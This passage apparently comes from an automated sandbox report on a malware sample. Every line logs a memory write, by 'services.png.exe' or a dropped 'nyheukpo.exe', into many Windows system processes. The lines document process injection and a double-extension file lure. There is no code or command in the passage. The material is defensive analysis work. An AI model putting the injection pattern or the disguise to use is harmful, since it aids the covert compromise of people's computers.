Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 29A178C	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 29A1BF0	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 29A1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: AC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: B01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: B0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: B01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: B01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 910000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 951778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 95178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 951BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 951BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9A0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9E1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9E178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9E1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9E1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A91778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A9178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A91BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A91BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C350000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C391778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C39178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C391BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C391BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D81778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D8178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D81BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D81BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B9178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B91BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 110000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 151778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 15178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 151BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 151BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AF1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AF178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AF1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AF1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 290000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 2D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 411778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 41178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 411BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 411BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 941778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 94178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 941BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 941BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A5178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A51BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 190000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F5178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F51BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 5178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 51BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FB0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FF1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FF178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FF1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FF1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: AC0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: B01778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: B0178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: B01BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: B01BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 71778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 7178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 71BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 71BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E61778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E6178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E61BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E61BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 810000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 851778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 85178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 851BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 851BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: EE0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F21778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F2178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F21BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: F21BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29D1BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E7178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E71BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 257178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2571BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E9178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E91BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 244178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2441BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 261178C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611BF0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2611BF4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE1778	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CE178C	Jump to behavior
